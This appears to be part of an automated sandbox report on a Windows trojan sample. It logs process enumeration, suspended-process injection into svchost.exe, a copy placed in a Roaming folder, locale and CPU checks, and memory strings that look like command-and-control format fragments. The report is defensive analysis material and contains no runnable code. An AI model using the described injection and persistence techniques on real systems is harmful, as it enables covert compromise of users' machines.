Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe 0_2_00007FF6CF9464B8
Source: C:\Windows\explorer.exe Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe 3_2_08B7D9FC
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe 4_2_00007FF6BCCA64B8
Source: C:\Windows\System32\svchost.exe Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe 5_2_00007FF78FA664B8
Source: C:\Windows\System32\svchost.exe Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe 9_2_00007FF7A34B64B8
Source: C:\Windows\System32\svchost.exe Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe 13_2_00007FF67F5564B8
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Process created: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe"
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: explorer.exe, 00000003.00000003.3095338529.0000000009B91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3099827021.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3318474411.0000000009C22000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000003.00000000.2101304423.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3306123969.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, explorer.exe, 00000003.00000002.3309997455.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2677691458.000000000CAF6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2101304423.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.2101304423.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3306123969.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.2101304423.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3306123969.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000002.3304418358.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2100969793.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
Source: explorer.exe, 00000003.00000003.2677691458.000000000CAF6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3319025344.0000000009EE0000.00000020.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3327889570.0000000011050000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: Host: http(s)://%s|%s|%s|%d|info|%d|%d|%d|%d|%s|%s|%d|%dMozilla\\.\pipe\%sopenShell_TrayWndverclsid.exe3264child.dllTrusteerABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/>?>>?456789:;<=
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\explorer.exe Code function: 3_2_0336A012 cpuid 3_2_0336A012
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson, 0_2_00007FF6CF95B934
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon, 0_2_00007FF6CF959868
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_00007FF6CF95D04C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: GetLocaleInfoEx, 0_2_00007FF6CF95B830
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP, 0_2_00007FF6CF95B77C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte, 0_2_00007FF6CF95CEF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num, 0_2_00007FF6CF959DF4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 0_2_00007FF6CF95A57C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA, 0_2_00007FF6CF94DD34
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: EnumSystemLocalesEx, 0_2_00007FF6CF9592F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson, 0_2_00007FF6CF9562BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson, 0_2_00007FF6CF95B310
Source: C:\Windows\explorer.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 3_2_09F081CC
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free, 3_2_09EFE35C
Source: C:\Windows\explorer.exe Code function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free, 3_2_09EFFAA0
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free, 3_2_09F08A38
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free, 3_2_09F08FC4
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 3_2_09F0974C
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx, 3_2_110821D0
Source: C:\Windows\explorer.exe Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx, 3_2_1107B0E0
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 3_2_1107A34C
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free, 3_2_11079BC4
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP, 3_2_1107B54C
Source: C:\Windows\explorer.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 3_2_11078DCC
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free, 3_2_11078C70
Source: C:\Windows\explorer.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage, 3_2_1107B704
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free, 3_2_1106EF5C
Source: C:\Windows\explorer.exe Code function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP, 3_2_110747D4
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx, 3_2_1107B600
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free, 3_2_11079638
Source: C:\Windows\explorer.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free, 3_2_110706A0
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num, 4_2_00007FF6BCCB9DF4
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 4_2_00007FF6BCCBA57C
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte, 4_2_00007FF6BCCBCEF0
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: GetLocaleInfoEx, 4_2_00007FF6BCCBB830
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP, 4_2_00007FF6BCCBB77C
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson, 4_2_00007FF6BCCBB934
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 4_2_00007FF6BCCBD04C
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon, 4_2_00007FF6BCCB9868
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson, 4_2_00007FF6BCCBB310
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson, 4_2_00007FF6BCCB62BC
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: EnumSystemLocalesEx, 4_2_00007FF6BCCB92F0
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA, 4_2_00007FF6BCCADD34
Source: C:\Windows\System32\svchost.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 5_2_00007FF78FA7D04C
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx, 5_2_00007FF78FA7B830
Source: C:\Windows\System32\svchost.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon, 5_2_00007FF78FA79868
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP, 5_2_00007FF78FA7B77C
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte, 5_2_00007FF78FA7CEF0
Source: C:\Windows\System32\svchost.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num, 5_2_00007FF78FA79DF4
Source: C:\Windows\System32\svchost.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA, 5_2_00007FF78FA6DD34
Source: C:\Windows\System32\svchost.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 5_2_00007FF78FA7A57C
Source: C:\Windows\System32\svchost.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson, 5_2_00007FF78FA762BC
Source: C:\Windows\System32\svchost.exe Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson, 5_2_00007FF78FA7B310
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesEx, 5_2_00007FF78FA792F0
Source: C:\Windows\System32\svchost.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson, 5_2_00007FF78FA7B934
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesEx, 9_2_00007FF7A34C92F0
Source: C:\Windows\System32\svchost.exe Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson, 9_2_00007FF7A34CB310
Source: C:\Windows\System32\svchost.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson, 9_2_00007FF7A34C62BC
Source: C:\Windows\System32\svchost.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson, 9_2_00007FF7A34CB934
Source: C:\Windows\System32\svchost.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon, 9_2_00007FF7A34C9868
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx, 9_2_00007FF7A34CB830
